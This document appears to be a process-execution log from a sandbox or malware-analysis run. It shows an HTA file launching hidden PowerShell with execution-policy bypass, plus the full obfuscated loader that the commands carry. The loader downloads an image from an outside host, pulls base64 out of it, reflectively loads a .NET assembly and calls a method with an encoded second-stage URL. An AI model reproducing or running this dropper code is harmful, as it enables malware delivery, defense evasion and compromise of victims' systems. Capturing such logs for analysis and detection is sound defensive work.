iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\brAZILLLFile_HTA.hta.html
2624powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAkAFAAUwBoAE8AbQBlAFsANABdACsAJABwAFMASABvAE0ARQBbADMANABdACsAJwBYACcAKQAoACgAKAAnAHsAMQB9AGkAbQBhAGcAZQBVAHIAbAAgAD0AIAB7ADAAfQBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AJwArACcAbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA2ADYANwAvADYAMAA4AC8AbwByAGkAZwBpAG4AYQBsAC8AaAB0AGEALgBqAHAAZwA/ADEANwAwADAAMgA2ADgAOAA0ADAAewAwAH0AOwB7ADEAfQB3AGUAYgBDAGwAaQBlAG4AJwArACcAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ADsAewAxAH0AaQBtAGEAZwBlAEIAeQB0AGUAcwAnACsAJwAgAD0AIAB7ADEAfQB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAewAxAH0AaQBtAGEAZwAnACsAJwBlAFUAcgBsACkAOwB7ADEAfQBpAG0AYQBnACcAKwAnAGUAVABlAHgAdAAgAD0AIAAnACsAJwBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAB7ADEAfQBpAG0AYQBnACcAKwAnAGUAQgB5AHQAZQBzACkAOwB7ADEAfQBzAHQAYQByAHQARgBsAGEAZwAgAD0AIAB7ADAAfQA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+AHsAMAB9ADsAewAxAH0AZQBuAGQARgBsAGEAZwAgAD0AIAB7ADAAfQA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAAnACsAJwA+AD4AewAwAH0AOwB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAHsAMQB9AGkAbQBhAGcAZQBUAGUAeAAnACsAJwB0AC4ASQBuAGQAZQAnACsAJwB4AE8AZgAoAHsAMQB9AHMAdABhAHIAdABGAGwAYQBnACkAOwB7ACcAKwAnADEAfQBlAG4AZABJAG4AZABlAHgAIAA9ACAAewAxAH0AaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAewAxACcAKwAnAH0AJwArACcAZQBuAGQARgBsAGEAZwApADsAewAxAH0AcwAnACsAJwB0AGEAcgB0AEkAbgAnACsAJwBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAB7ADEAfQBlACcAKwAnAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgAHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgAOwB7ADEAfQBzAHQAYQAnACsAJwByAHQASQBuAGQAZQB4ACAAKwA9ACAAewAxAH0AJwArACcAcwB0AGEAJwArACcAcgAnACsAJwB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AHsAMQB9AGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAHsAMQB9AGUAbgAnACsAJwBkAEkAbgBkAGUAeAAgAC0AIAB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ADsAewAxAH0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhACcAKwAnAG4AZAAgAD0AIAB7ADEAfQBpAG0AJwArACcAYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAewAxAH0AcwB0AGEAcgB0AEkAJwArACcAbgBkAGUAeAAsACAAewAxAH0AYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7AHsAMQB9AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAB7ADEAfQBiAGEAcwBlADYANABDACcAKwAnAG8AbQBtAGEAbgBkACkAOwB7ADEAfQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvACcAKwAnAGEAZAAoAHsAMQB9AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwB7ADEAfQB0AHkAcABlACAAPQAgAHsAMQB9AGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAB7ADAAfQBGAGkAYgBlAHIALgBIAG8AbQBlAHsAMAB9ACkAOwB7ADEAfQBtAGUAdABoAG8AZAAgAD0AIAB7ADEAfQB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAB7ADAAfQBWAEEASQB7ADAAfQApAC4ASQBuAHYAbwBrAGUAKAB7ADEAfQBuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAB7ADAAfQBNAGoAUQB3AFkAMgBZAHoAWgBEAEUANQBPAFQAQgBoAEwAVwBFADEAWQBtAEUAdABaAFQARQB4ACcAKwAnAE4AQwAwAHoATQBXAE0ANABMAFQAWQAnACsAJwB4AE0ARAAnACsAJwBZADEATwBEAEkAeABQAFcANQBsAGEAMgA5ADAASgBtAEYAcABaAEcAVgB0AFAAWABSAHMAWQBUADkAMABlAEgAUQB1AE4ARABaAGwAYwAyAEYAaQBjAEcAOQBqAGMAMgBWAHoAZQBXADAAdgBiAHkAOQB0ACcAKwAnAGIAMgBNAHUAZABHADkAdwBjADMAQgB3AFkAUwA0ADIATgBHAEUAeABNAGkAMQBrAGEAVwA5AHkAWgBDADkAJwArACcAaQBMAHoAQgAyAEwAMgAxAHYAWQB5ADUAegBhAFgAQgBoAFoAVwB4AG4AYgAyADkAbgBMAG0AVgBuAFkAWABKAHYAZABIAE4AbABjADIARgBpAFoAWABKAHAAWgBpADgAdgBPAG4ATgB3AGQASAAnACsAJwBSAG8AewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgBkAHsAMAB9ACAALAAgAHsAMAB9AGQAZgBkAGYAewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgB7ADAAfQAgACwAIAB7ADAAfQBkAGEAZABzAGEAewAwAH0AIAAsACAAewAnACsAJwAwAH0AZABlAHsAMAB9ACAALAAgAHsAMAB9AGMAdQB7ADAAfQApACcAKwAnACkAJwApAC0AZgAgACAAWwBDAEgAYQBSAF0AMwA5ACwAWwBDAEgAYQBSAF0AMwA2ACkAIAApAA==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
2944powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $PShOme[4]+$pSHoME[34]+'X')((('{1}imageUrl = {0}https://uploaddeimagens.co'+'m.br/images/004/667/608/original/hta.jpg?1700268840{0};{1}webClien'+'t = New-Object System.Net.We'+'bClient;{1}imageBytes'+' = {1}webClient.DownloadData({1}imag'+'eUrl);{1}imag'+'eText = '+'[System.Text.Encoding]::UTF8.GetString({1}imag'+'eBytes);{1}startFlag = {0}<<BASE64_START>>{0};{1}endFlag = {0}<<BASE64_END'+'>>{0};{1}startIndex = {1}imageTex'+'t.Inde'+'xOf({1}startFlag);{'+'1}endIndex = {1}imageText.IndexOf({1'+'}'+'endFlag);{1}s'+'tartIn'+'dex -ge 0 -and {1}e'+'ndIndex -gt {1}startIndex;{1}sta'+'rtIndex += {1}'+'sta'+'r'+'tFlag.Length;{1}base64Length = {1}en'+'dIndex - {1}startIndex;{1}base64Comma'+'nd = {1}im'+'ageText.Substring({1}startI'+'ndex, {1}base64Length);{1}commandBytes = [Syst'+'em.Convert]::FromBase64String({1}base64C'+'ommand);{1}loadedAssembly = [System.Reflection.Assembly]::Lo'+'ad({1}commandBytes);{1}type = {1}loadedAssembly.GetType({0}Fiber.Home{0});{1}method = {1}type.GetMethod({0}VAI{0}).Invoke({1}null, [object[]] ({0}MjQwY2YzZDE5OTBhLWE1YmEtZTEx'+'NC0zMWM4LTY'+'xMD'+'Y1ODIxPW5la290JmFpZGVtPXRsYT90eHQuNDZlc2FicG9jc2VzeW0vby9t'+'b2MudG9wc3BwYS42NGExMi1kaW9yZC9'+'iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdH'+'Ro{0} , {0}dfdfd{0} , {0}dfdf{0} , {0}dfdf{0} , {0}dadsa{0} , {'+'0}de{0} , {0}cu{0})'+')')-f [CHaR]39,[CHaR]36) )"
1356